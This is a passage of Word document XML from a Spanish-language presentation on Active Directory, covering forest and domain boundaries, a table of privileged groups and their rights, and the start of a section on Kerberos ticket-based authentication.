                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="11C05CF6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="60"/>
                              <w:ind w:left="257"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Límite administrativo para usuarios y servidores</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="342C1F42" id="Textbox 158" o:spid="_x0000_s1107" type="#_x0000_t202" style="position:absolute;margin-left:6pt;margin-top:18.55pt;width:240.6pt;height:21.75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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="11C05CF6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="60"/>
                        <w:ind w:left="257"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Límite administrativo para usuarios y servidores</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11904" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7DAADC18" wp14:editId="1ECA7BA2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>10264140</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>352716</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1805939" cy="646430"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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39" cy="646430"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7006F630" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="61" w:line="290" w:lineRule="exact"/>
                              <w:ind w:left="2"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Presente en cada servidor.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="561F9170" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="2" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="582" w:right="574"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Almacena la información de AD DB.</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="7DAADC18" id="Textbox 159" o:spid="_x0000_s1108" type="#_x0000_t202" style="position:absolute;margin-left:808.2pt;margin-top:27.75pt;width:142.2pt;height:50.9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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7006F630" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="61" w:line="290" w:lineRule="exact"/>
                        <w:ind w:left="2"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Presente en cada servidor.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="561F9170" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="2" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="582" w:right="574"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Almacena la información de AD DB.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="71920855" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A56914E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="110"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58F5B384" wp14:editId="64F4BB99">
                <wp:extent cx="3055620" cy="462280"/>
                <wp:effectExtent l="9525" t="0" r="1905" b="13970"/>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462280"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="77A135E2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="1625" w:hanging="1136"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Representa una colección de dominios que comparten una base de datos de AD común</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="58F5B384" id="Textbox 160" o:spid="_x0000_s1109" type="#_x0000_t202" style="width:240.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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="77A135E2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="1625" w:hanging="1136"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Representa una colección de dominios que comparten una base de datos de AD común</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="36110A85" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="560" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10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8573"/>
        <w:gridCol w:w="8573"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="400ABEA1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1396"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8573" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4471C4"/>
          </w:tcPr>
          <w:p w14:paraId="46CD5819" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="52"/>
              <w:ind w:left="23" w:right="4"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Grupos privilegiados</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8573" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4471C4"/>
          </w:tcPr>
          <w:p w14:paraId="4EB9915F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="52"/>
              <w:ind w:left="23" w:right="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Privilegios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="2467C0BF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1437"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8573" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="77400D83" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="36"/>
              <w:ind w:left="23" w:right="6"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Administradores de dominio (DA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8573" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="6F53516C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="36" w:line="484" w:lineRule="exact"/>
              <w:ind w:left="23" w:right="6"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Tener acceso administrativo a todos los recursos de un</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A679FBB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="484" w:lineRule="exact"/>
              <w:ind w:left="23" w:right="1"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>dominio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="327E5FF2" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1458"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8573" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="3B5A23DF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="23" w:right="6"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Administradores de empresa (DA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8573" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="0C1EFC9B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="484" w:lineRule="exact"/>
              <w:ind w:left="23" w:right="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Solo existe en la raíz del bosque, ya agregada a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BCD6A94" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="0" w:line="484" w:lineRule="exact"/>
              <w:ind w:left="23" w:right="2"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Administradores de dominio de cada niño</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="3329D2E4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1415"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8573" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="353398E3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="23" w:right="6"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>BUILTIN\Administradores (grupo local)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8573" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="177D0B5E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="23" w:right="1"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Administrador local en un controlador de dominio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="1A721282" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1415"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8573" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="668C4214" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="23" w:right="6"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Operadores de servidor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8573" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E9EBF5"/>
          </w:tcPr>
          <w:p w14:paraId="2DCFDD85" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="23"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Tener la capacidad de administrar el servidor de dominio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B199E" w:rsidRPr="007A7B84" w14:paraId="37247508" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1416"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8573" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="253CBAE1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="57"/>
              <w:ind w:left="23" w:right="5"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Operadores de cuentas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8573" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="CFD4EA"/>
          </w:tcPr>
          <w:p w14:paraId="25D9FF50" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="57"/>
              <w:ind w:left="23"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A7B84">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Administrar cualquier usuario que no pertenezca a un grupo privilegiado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CAA8D00" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="TableParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="840" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05EFEB5B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1044"/>
        </w:tabs>
        <w:spacing w:before="57"/>
        <w:ind w:left="1044" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Autenticación Kerberos </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6024B7EE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1763"/>
          <w:tab w:val="left" w:pos="1765"/>
        </w:tabs>
        <w:spacing w:before="575" w:line="235" w:lineRule="auto"/>
        <w:ind w:right="570"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>En el entorno de Active Directory, todo el proceso de consultas y autenticación se realiza a través de tickets. Por lo tanto, no hay contraseñas en cada viaje a la red.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB1164D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="90"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B176F1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1763"/>
          <w:tab w:val="left" w:pos="1765"/>
        </w:tabs>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:right="849"/>
        <w:rPr>
